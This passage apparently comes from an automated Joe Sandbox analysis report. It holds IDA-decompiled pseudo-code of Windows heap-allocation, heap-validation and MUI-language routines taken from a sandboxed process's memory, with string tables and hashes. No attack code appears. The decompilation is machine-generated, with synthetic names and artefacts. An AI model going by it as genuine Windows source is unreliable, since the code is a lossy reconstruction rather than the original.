                    									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    								} else {
                    									_t289 = 0x7ffe0380;
                    								}
                    								__eflags =  *_t289;
                    								if( *_t289 != 0) {
                    									_t290 =  *[fs:0x30];
                    									__eflags =  *(_t290 + 0x240) & 1;
                    									if(( *(_t290 + 0x240) & 1) != 0) {
                    										__eflags = E01687D50();
                    										if(__eflags != 0) {
                    											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    										}
                    										E01721411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                    									}
                    								}
                    								_t291 = E01687D50();
                    								_t543 = 0x7ffe038a;
                    								__eflags = _t291;
                    								if(_t291 != 0) {
                    									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                    								} else {
                    									_t246 = 0x7ffe038a;
                    								}
                    								__eflags =  *_t246;
                    								if( *_t246 != 0) {
                    									__eflags = E01687D50();
                    									if(__eflags != 0) {
                    										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                    										__eflags = _t543;
                    									}
                    									_push( *_t543 & 0x000000ff);
                    									_push(_t446);
                    									_push(_t446);
                    									L120:
                    									_push( *(_t553 + 0x74) << 3);
                    									_push(_v52);
                    									_t246 = E01721411(_t446, _t553, _v44, __eflags);
                    								}
                    								goto L7;
                    							}
                    							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                    							_t339 = E0169174B( &_v44,  &_v52, 0x4000);
                    							__eflags = _t339;
                    							if(_t339 < 0) {
                    								L94:
                    								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                    								__eflags = _v40;
                    								if(_v40 == 0) {
                    									goto L153;
                    								}
                    								E0168B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                    								goto L152;
                    							}
                    							_t344 = E01687D50();
                    							__eflags = _t344;
                    							if(_t344 != 0) {
                    								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    							} else {
                    								_t347 = 0x7ffe0380;
                    							}
                    							__eflags =  *_t347;
                    							if( *_t347 != 0) {
                    								_t348 =  *[fs:0x30];
                    								__eflags =  *(_t348 + 0x240) & 1;
                    								if(( *(_t348 + 0x240) & 1) != 0) {
                    									E017214FB(_t445, _t553, _v44, _v52, 6);
                    								}
                    							}
                    							_t513 = _v48;
                    							goto L33;
                    						}
                    						__eflags =  *_v12 - 3;
                    						_t513 = _v48;
                    						if( *_v12 == 3) {
                    							goto L27;
                    						}
                    						__eflags = _t460;
                    						if(_t460 == 0) {
                    							goto L9;
                    						}
                    						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                    						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                    							goto L9;
                    						}
                    						goto L27;
                    					}
                    				}
                    				_t445 = _a4;
                    				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                    					_t513 = __edx;
                    					goto L10;
                    				}
                    				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                    				_v20 = _t433;
                    				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                    					_t513 = _t539;
                    					goto L9;
                    				} else {
                    					_t437 = E016899BF(__ecx, __edx,  &_a4, 0);
                    					_t445 = _a4;
                    					_t514 = _t437;
                    					_v56 = _t514;
                    					if(_t445 - 0x201 > 0xfbff) {
                    						goto L14;
                    					} else {
                    						E0168A830(__ecx, _t514, _t445);
                    						_t506 =  *(_t553 + 0x238);
                    						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                    						_t246 = _t506 >> 4;
                    						if(_t551 < _t506 - _t246) {
                    							_t508 =  *(_t553 + 0x23c);
                    							_t246 = _t508 >> 2;
                    							__eflags = _t551 - _t508 - _t246;
                    							if(_t551 > _t508 - _t246) {
                    								_t246 = E0169ABD8(_t553);
                    								 *(_t553 + 0x23c) = _t551;
                    								 *(_t553 + 0x238) = _t551;
                    							}
                    						}
                    						goto L7;
                    					}
                    				}
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-523794902
                    • Opcode ID: b1f50edbd17dcd08a5795aa8343eec6fb088aad7b1c8b90bf59f2039284263d0
                    • Instruction ID: ecb14a65071dac3757e8e404c58f3457126c4e201376e7e8589b99456752c266
                    • Opcode Fuzzy Hash: b1f50edbd17dcd08a5795aa8343eec6fb088aad7b1c8b90bf59f2039284263d0
                    • Instruction Fuzzy Hash: 2542F1716047419FC715EF68CC94B2ABBE6FF84204F044A6EE986CB352D774D982CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 64%
                    			E01722D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t83;
                    				signed char _t89;
                    				intOrPtr _t90;
                    				signed char _t101;
                    				signed int _t102;
                    				intOrPtr _t104;
                    				signed int _t105;
                    				signed int _t106;
                    				intOrPtr _t108;
                    				intOrPtr _t112;
                    				short* _t130;
                    				short _t131;
                    				signed int _t148;
                    				intOrPtr _t149;
                    				signed int* _t154;
                    				short* _t165;
                    				signed int _t171;
                    				void* _t182;
                    
                    				_push(0x44);
                    				_push(0x1740e80);
                    				E016BD0E8(__ebx, __edi, __esi);
                    				_t177 = __edx;
                    				_t181 = __ecx;
                    				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                    				 *((char*)(_t182 - 0x1d)) = 0;
                    				 *(_t182 - 0x24) = 0;
                    				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                    					 *((intOrPtr*)(_t182 - 4)) = 0;
                    					 *((intOrPtr*)(_t182 - 4)) = 1;
                    					_t83 = E016640E1("RtlAllocateHeap");
                    					__eflags = _t83;
                    					if(_t83 == 0) {
                    						L48:
                    						 *(_t182 - 0x24) = 0;
                    						L49:
                    						 *((intOrPtr*)(_t182 - 4)) = 0;
                    						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                    						E017230C4();
                    						goto L50;
                    					}
                    					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                    					 *(_t182 - 0x28) = _t89;
                    					 *(_t182 - 0x3c) = _t89;
                    					_t177 =  *(_t182 + 8);
                    					__eflags = _t177;
                    					if(_t177 == 0) {
                    						_t171 = 1;
                    						__eflags = 1;
                    					} else {
                    						_t171 = _t177;
                    					}
                    					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                    					__eflags = _t148 - 0x10;
                    					if(_t148 < 0x10) {
                    						_t148 = 0x10;
                    					}
                    					_t149 = _t148 + 8;
                    					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                    					__eflags = _t149 - _t177;
                    					if(_t149 < _t177) {
                    						L44:
                    						_t90 =  *[fs:0x30];
                    						__eflags =  *(_t90 + 0xc);
                    						if( *(_t90 + 0xc) == 0) {
                    							_push("HEAP: ");
                    							E0166B150();
                    						} else {
                    							E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    						}
                    						_push( *((intOrPtr*)(_t181 + 0x78)));
                    						E0166B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                    						goto L48;
                    					} else {
                    						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                    						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                    							goto L44;
                    						}
                    						__eflags = _t89 & 0x00000001;
                    						if((_t89 & 0x00000001) != 0) {
                    							_t178 =  *(_t182 - 0x28);
                    						} else {
                    							E0167EEF0( *((intOrPtr*)(_t181 + 0xc8)));
                    							 *((char*)(_t182 - 0x1d)) = 1;
                    							_t178 =  *(_t182 - 0x28) | 0x00000001;
                    							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                    						}
                    						E01724496(_t181, 0);
                    						_t177 = L01684620(_t181, _t181, _t178,  *(_t182 + 8));
                    						 *(_t182 - 0x24) = _t177;
                    						_t173 = 1;
                    						E017249A4(_t181);
                    						__eflags = _t177;
                    						if(_t177 == 0) {
                    							goto L49;
                    						} else {
                    							_t177 = _t177 + 0xfffffff8;
                    							__eflags =  *((char*)(_t177 + 7)) - 5;
                    							if( *((char*)(_t177 + 7)) == 5) {
                    								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                    								__eflags = _t177;
                    							}
                    							_t154 = _t177;
                    							 *(_t182 - 0x40) = _t177;
                    							__eflags =  *(_t181 + 0x4c);
                    							if( *(_t181 + 0x4c) != 0) {
                    								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                    								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                    								if(__eflags != 0) {
                    									_push(_t154);
                    									_t173 = _t177;
                    									E0171FA2B(0, _t181, _t177, _t177, _t181, __eflags);
                    								}
                    							}
                    							__eflags =  *(_t177 + 2) & 0x00000002;
                    							if(( *(_t177 + 2) & 0x00000002) == 0) {
                    								_t101 =  *(_t177 + 3);
                    								 *(_t182 - 0x29) = _t101;
                    								_t102 = _t101 & 0x000000ff;
                    							} else {
                    								_t130 = E01661F5B(_t177);
                    								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                    								__eflags =  *(_t181 + 0x40) & 0x08000000;
                    								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                    									 *_t130 = 0;
                    								} else {
                    									_t131 = E016916C7(1, _t173);
                    									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                    									 *_t165 = _t131;
                    									_t130 = _t165;
                    								}
                    								_t102 =  *(_t130 + 2) & 0x0000ffff;
                    							}
                    							 *(_t182 - 0x34) = _t102;
                    							 *(_t182 - 0x28) = _t102;
                    							__eflags =  *(_t181 + 0x4c);
                    							if( *(_t181 + 0x4c) != 0) {
                    								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                    								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                    								__eflags =  *_t177;
                    							}
                    							__eflags =  *(_t181 + 0x40) & 0x20000000;
                    							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                    								__eflags = 0;
                    								E01724496(_t181, 0);
                    							}
                    							__eflags =  *(_t182 - 0x24) -  *0x1756360; // 0x0
                    							_t104 =  *[fs:0x30];
                    							if(__eflags != 0) {
                    								_t105 =  *(_t104 + 0x68);
                    								 *(_t182 - 0x4c) = _t105;
                    								__eflags = _t105 & 0x00000800;
                    								if((_t105 & 0x00000800) == 0) {
                    									goto L49;
                    								}
                    								_t106 =  *(_t182 - 0x34);
                    								__eflags = _t106;
                    								if(_t106 == 0) {
                    									goto L49;
                    								}
                    								__eflags = _t106 -  *0x1756364; // 0x0
                    								if(__eflags != 0) {
                    									goto L49;
                    								}
                    								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x1756366; // 0x0
                    								if(__eflags != 0) {
                    									goto L49;
                    								}
                    								_t108 =  *[fs:0x30];
                    								__eflags =  *(_t108 + 0xc);
                    								if( *(_t108 + 0xc) == 0) {
                    									_push("HEAP: ");
                    									E0166B150();
                    								} else {
                    									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    								}
                    								_push(E0170D455(_t181,  *(_t182 - 0x28)));
                    								_push( *(_t182 + 8));
                    								E0166B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                    								goto L34;
                    							} else {
                    								__eflags =  *(_t104 + 0xc);
                    								if( *(_t104 + 0xc) == 0) {
                    									_push("HEAP: ");
                    									E0166B150();
                    								} else {
                    									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    								}
                    								_push( *(_t182 + 8));
                    								E0166B150("Just allocated block at %p for %Ix bytes\n",  *0x1756360);
                    								L34:
                    								_t112 =  *[fs:0x30];
                    								__eflags =  *((char*)(_t112 + 2));
                    								if( *((char*)(_t112 + 2)) != 0) {
                    									 *0x1756378 = 1;
                    									 *0x17560c0 = 0;
                    									asm("int3");
                    									 *0x1756378 = 0;
                    								}
                    								goto L49;
                    							}
                    						}
                    					}
                    				} else {
                    					_t181 =  *0x1755708; // 0x0
                    					 *0x175b1e0(__ecx, __edx,  *(_t182 + 8));
                    					 *_t181();
                    					L50:
                    					return E016BD130(0, _t177, _t181);
                    				}
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                    • API String ID: 0-1745908468
                    • Opcode ID: 91deb1bc1ca50bd949f38fe0291b48419f348b9cf8fb9d4ca7f38f5d595fd18d
                    • Instruction ID: 1041ee9f4f853e2a65f9b06e521371111963ac2e99f02b02021e85416db08bdd
                    • Opcode Fuzzy Hash: 91deb1bc1ca50bd949f38fe0291b48419f348b9cf8fb9d4ca7f38f5d595fd18d
                    • Instruction Fuzzy Hash: 1E913631A00691DFDB26DFA8C844AADFBF3FF49610F18805DE5469B252C739D982CB14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E01673D34(signed int* __ecx) {
                    				signed int* _v8;
                    				char _v12;
                    				signed int* _v16;
                    				signed int* _v20;
                    				char _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				char _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int* _v48;
                    				signed int* _v52;
                    				signed int _v56;
                    				signed int _v60;
                    				char _v68;
                    				signed int _t140;
                    				signed int _t161;
                    				signed int* _t236;
                    				signed int* _t242;
                    				signed int* _t243;
                    				signed int* _t244;
                    				signed int* _t245;
                    				signed int _t255;
                    				void* _t257;
                    				signed int _t260;
                    				void* _t262;
                    				signed int _t264;
                    				void* _t267;
                    				signed int _t275;
                    				signed int* _t276;
                    				short* _t277;
                    				signed int* _t278;
                    				signed int* _t279;
                    				signed int* _t280;
                    				short* _t281;
                    				signed int* _t282;
                    				short* _t283;
                    				signed int* _t284;
                    				void* _t285;
                    
                    				_v60 = _v60 | 0xffffffff;
                    				_t280 = 0;
                    				_t242 = __ecx;
                    				_v52 = __ecx;
                    				_v8 = 0;
                    				_v20 = 0;
                    				_v40 = 0;
                    				_v28 = 0;
                    				_v32 = 0;
                    				_v44 = 0;
                    				_v56 = 0;
                    				_t275 = 0;
                    				_v16 = 0;
                    				if(__ecx == 0) {
                    					_t280 = 0xc000000d;
                    					_t140 = 0;
                    					L50:
                    					 *_t242 =  *_t242 | 0x00000800;
                    					_t242[0x13] = _t140;
                    					_t242[0x16] = _v40;
                    					_t242[0x18] = _v28;
                    					_t242[0x14] = _v32;
                    					_t242[0x17] = _t275;
                    					_t242[0x15] = _v44;
                    					_t242[0x11] = _v56;
                    					_t242[0x12] = _v60;
                    					return _t280;
                    				}
                    				if(E01671B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                    					_v56 = 1;
                    					if(_v8 != 0) {
                    						L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                    					}
                    					_v8 = _t280;
                    				}
                    				if(E01671B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                    					_v60 =  *_v8;
                    					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                    					_v8 = _t280;
                    				}
                    				if(E01671B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                    					L16:
                    					if(E01671B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                    						L28:
                    						if(E01671B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                    							L46:
                    							_t275 = _v16;
                    							L47:
                    							_t161 = 0;
                    							L48:
                    							if(_v8 != 0) {
                    								L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                    							}
                    							_t140 = _v20;
                    							if(_t140 != 0) {
                    								if(_t275 != 0) {
                    									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                    									_t275 = 0;
                    									_v28 = 0;
                    									_t140 = _v20;
                    								}
                    							}
                    							goto L50;
                    						}
                    						_t167 = _v12;
                    						_t255 = _v12 + 4;
                    						_v44 = _t255;
                    						if(_t255 == 0) {
                    							_t276 = _t280;
                    							_v32 = _t280;
                    						} else {
                    							_t276 = L01684620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                    							_t167 = _v12;
                    							_v32 = _t276;
                    						}
                    						if(_t276 == 0) {
                    							_v44 = _t280;
                    							_t280 = 0xc0000017;
                    							goto L46;
                    						} else {
                    							E016AF3E0(_t276, _v8, _t167);
                    							_v48 = _t276;
                    							_t277 = E016B1370(_t276, 0x1644e90);
                    							_pop(_t257);
                    							if(_t277 == 0) {
                    								L38:
                    								_t170 = _v48;
                    								if( *_v48 != 0) {
                    									E016ABB40(0,  &_v68, _t170);
                    									if(L016743C0( &_v68,  &_v24) != 0) {
                    										_t280 =  &(_t280[0]);
                    									}
                    								}
                    								if(_t280 == 0) {
                    									_t280 = 0;
                    									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                    									_v44 = 0;
                    									_v32 = 0;
                    								} else {
                    									_t280 = 0;
                    								}
                    								_t174 = _v8;
                    								if(_v8 != 0) {
                    									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                    								}
                    								_v8 = _t280;
                    								goto L46;
                    							}
                    							_t243 = _v48;
                    							do {
                    								 *_t277 = 0;
                    								_t278 = _t277 + 2;
                    								E016ABB40(_t257,  &_v68, _t243);
                    								if(L016743C0( &_v68,  &_v24) != 0) {
                    									_t280 =  &(_t280[0]);
                    								}
                    								_t243 = _t278;
                    								_t277 = E016B1370(_t278, 0x1644e90);
                    								_pop(_t257);
                    							} while (_t277 != 0);
                    							_v48 = _t243;
                    							_t242 = _v52;
                    							goto L38;
                    						}
                    					}
                    					_t191 = _v12;
                    					_t260 = _v12 + 4;
                    					_v28 = _t260;
                    					if(_t260 == 0) {
                    						_t275 = _t280;
                    						_v16 = _t280;
                    					} else {
                    						_t275 = L01684620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                    						_t191 = _v12;
                    						_v16 = _t275;
                    					}
                    					if(_t275 == 0) {
                    						_v28 = _t280;
                    						_t280 = 0xc0000017;
                    						goto L47;
                    					} else {
                    						E016AF3E0(_t275, _v8, _t191);
                    						_t285 = _t285 + 0xc;
                    						_v48 = _t275;
                    						_t279 = _t280;
                    						_t281 = E016B1370(_v16, 0x1644e90);
                    						_pop(_t262);
                    						if(_t281 != 0) {
                    							_t244 = _v48;
                    							do {
                    								 *_t281 = 0;
                    								_t282 = _t281 + 2;
                    								E016ABB40(_t262,  &_v68, _t244);
                    								if(L016743C0( &_v68,  &_v24) != 0) {
                    									_t279 =  &(_t279[0]);
                    								}
                    								_t244 = _t282;
                    								_t281 = E016B1370(_t282, 0x1644e90);
                    								_pop(_t262);
                    							} while (_t281 != 0);
                    							_v48 = _t244;
                    							_t242 = _v52;
                    						}
                    						_t201 = _v48;
                    						_t280 = 0;
                    						if( *_v48 != 0) {
                    							E016ABB40(_t262,  &_v68, _t201);
                    							if(L016743C0( &_v68,  &_v24) != 0) {
                    								_t279 =  &(_t279[0]);
                    							}
                    						}
                    						if(_t279 == 0) {
                    							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                    							_v28 = _t280;
                    							_v16 = _t280;
                    						}
                    						_t202 = _v8;
                    						if(_v8 != 0) {
                    							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                    						}
                    						_v8 = _t280;
                    						goto L28;
                    					}
                    				}
                    				_t214 = _v12;
                    				_t264 = _v12 + 4;
                    				_v40 = _t264;
                    				if(_t264 == 0) {
                    					_v20 = _t280;
                    				} else {
                    					_t236 = L01684620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                    					_t280 = _t236;
                    					_v20 = _t236;
                    					_t214 = _v12;
                    				}
                    				if(_t280 == 0) {
                    					_t161 = 0;
                    					_t280 = 0xc0000017;
                    					_v40 = 0;
                    					goto L48;
                    				} else {
                    					E016AF3E0(_t280, _v8, _t214);
                    					_t285 = _t285 + 0xc;
                    					_v48 = _t280;
                    					_t283 = E016B1370(_t280, 0x1644e90);
                    					_pop(_t267);
                    					if(_t283 != 0) {
                    						_t245 = _v48;
                    						do {
                    							 *_t283 = 0;
                    							_t284 = _t283 + 2;
                    							E016ABB40(_t267,  &_v68, _t245);
                    							if(L016743C0( &_v68,  &_v24) != 0) {
                    								_t275 = _t275 + 1;
                    							}
                    							_t245 = _t284;
                    							_t283 = E016B1370(_t284, 0x1644e90);
                    							_pop(_t267);
                    						} while (_t283 != 0);
                    						_v48 = _t245;
                    						_t242 = _v52;
                    					}
                    					_t224 = _v48;
                    					_t280 = 0;
                    					if( *_v48 != 0) {
                    						E016ABB40(_t267,  &_v68, _t224);
                    						if(L016743C0( &_v68,  &_v24) != 0) {
                    							_t275 = _t275 + 1;
                    						}
                    					}
                    					if(_t275 == 0) {
                    						L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                    						_v40 = _t280;
                    						_v20 = _t280;
                    					}
                    					_t225 = _v8;
                    					if(_v8 != 0) {
                    						L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                    					}
                    					_v8 = _t280;
                    					goto L16;
                    				}
                    			}

                    Strings
                    • Kernel-MUI-Language-SKU, xrefs: 01673F70
                    • WindowsExcludedProcs, xrefs: 01673D6F
                    • Kernel-MUI-Language-Disallowed, xrefs: 01673E97
                    • Kernel-MUI-Number-Allowed, xrefs: 01673D8C
                    • Kernel-MUI-Language-Allowed, xrefs: 01673DC0
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                    • API String ID: 0-258546922
                    • Opcode ID: 4f997cea4fc556bc9369b349e708b3fec6c722c8b523fabcc6743cc5fddb2bee
                    • Instruction ID: 88814dec58363fba724912de9ae1f86bcef4af93cef3a1ffd2fd95f74a3b1e5a
                    • Opcode Fuzzy Hash: 4f997cea4fc556bc9369b349e708b3fec6c722c8b523fabcc6743cc5fddb2bee
                    • Instruction Fuzzy Hash: 1FF14D72D00619EFCB21DF98CD84AEEBBBAFF58650F15415AE505A7310EB749E01CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 29%
                    			E016640E1(void* __edx) {
                    				void* _t19;
                    				void* _t29;
                    
                    				_t28 = _t19;
                    				_t29 = __edx;
                    				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push("HEAP: ");
                    						E0166B150();
                    					} else {
                    						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					E0166B150("Invalid heap signature for heap at %p", _t28);
                    					if(_t29 != 0) {
                    						E0166B150(", passed to %s", _t29);
                    					}
                    					_push("\n");
                    					E0166B150();
                    					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                    						 *0x1756378 = 1;
                    						asm("int3");
                    						 *0x1756378 = 0;
                    					}
                    					return 0;
                    				}
                    				return 1;
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                    • API String ID: 0-188067316
                    • Opcode ID: 924bf7acfe13535b646e3ae0bcf6aa05832f28fc180b1651726f4866af4d0297
                    • Instruction ID: 0d69fb1821986ae24df67368d32328d71aeaf7aa9cca3a3e25fb9f5335d39f3f
                    • Opcode Fuzzy Hash: 924bf7acfe13535b646e3ae0bcf6aa05832f28fc180b1651726f4866af4d0297
                    • Instruction Fuzzy Hash: 3F01D877215641EFD3299B69EC0DF62F7A9DB42F35F19C06DF005877418BA49480C619
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 70%
                    			E0168A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                    				void* _v5;
                    				signed short _v12;
                    				intOrPtr _v16;
                    				signed int _v20;
                    				signed short _v24;
                    				signed short _v28;
                    				signed int _v32;
                    				signed short _v36;
                    				signed int _v40;
                    				intOrPtr _v44;
                    				intOrPtr _v48;
                    				signed short* _v52;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t131;
                    				signed char _t134;
                    				signed int _t138;
                    				char _t141;
                    				signed short _t142;
                    				void* _t146;
                    				signed short _t147;
                    				intOrPtr* _t149;
                    				intOrPtr _t156;
                    				signed int _t167;
                    				signed int _t168;
                    				signed short* _t173;
                    				signed short _t174;
                    				intOrPtr* _t182;
                    				signed short _t184;
                    				intOrPtr* _t187;
                    				intOrPtr _t197;
                    				intOrPtr _t206;
                    				intOrPtr _t210;
                    				signed short _t211;
                    				intOrPtr* _t212;
                    				signed short _t214;
                    				signed int _t216;
                    				intOrPtr _t217;
                    				signed char _t225;
                    				signed short _t235;
                    				signed int _t237;
                    				intOrPtr* _t238;
                    				signed int _t242;
                    				unsigned int _t245;
                    				signed int _t251;
                    				intOrPtr* _t252;
                    				signed int _t253;
                    				intOrPtr* _t255;
                    				signed int _t256;
                    				void* _t257;
                    				void* _t260;
                    
                    				_t256 = __edx;
                    				_t206 = __ecx;
                    				_t235 = _a4;
                    				_v44 = __ecx;
                    				_v24 = _t235;
                    				if(_t235 == 0) {
                    					L41:
                    					return _t131;
                    				}
                    				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                    				if(_t251 == 0) {
                    					__eflags =  *0x1758748 - 1;
                    					if( *0x1758748 >= 1) {
                    						__eflags =  *(__edx + 2) & 0x00000008;
                    						if(( *(__edx + 2) & 0x00000008) == 0) {
                    							_t110 = _t256 + 0xfff; // 0xfe7
                    							__eflags = (_t110 & 0xfffff000) - __edx;
                    							if((_t110 & 0xfffff000) != __edx) {
                    								_t197 =  *[fs:0x30];
                    								__eflags =  *(_t197 + 0xc);
                    								if( *(_t197 + 0xc) == 0) {
                    									_push("HEAP: ");
                    									E0166B150();
                    									_t260 = _t257 + 4;
                    								} else {
                    									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    									_t260 = _t257 + 8;
                    								}
                    								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                    								E0166B150();
                    								_t257 = _t260 + 4;
                    								__eflags =  *0x1757bc8;
                    								if(__eflags == 0) {
                    									E01722073(_t206, 1, _t251, __eflags);
                    								}
                    								_t235 = _v24;
                    							}
                    						}
                    					}
                    				}
                    				_t134 =  *((intOrPtr*)(_t256 + 6));
                    				if(_t134 == 0) {
                    					_t210 = _t206;
                    					_v48 = _t206;
                    				} else {
                    					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                    					_v48 = _t210;
                    				}
                    				_v5 =  *(_t256 + 2);
                    				do {
                    					if(_t235 > 0xfe00) {
                    						_v12 = 0xfe00;
                    						__eflags = _t235 - 0xfe01;
                    						if(_t235 == 0xfe01) {
                    							_v12 = 0xfdf0;
                    						}
                    						_t138 = 0;
                    					} else {
                    						_v12 = _t235 & 0x0000ffff;
                    						_t138 = _v5;
                    					}
                    					 *(_t256 + 2) = _t138;
                    					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
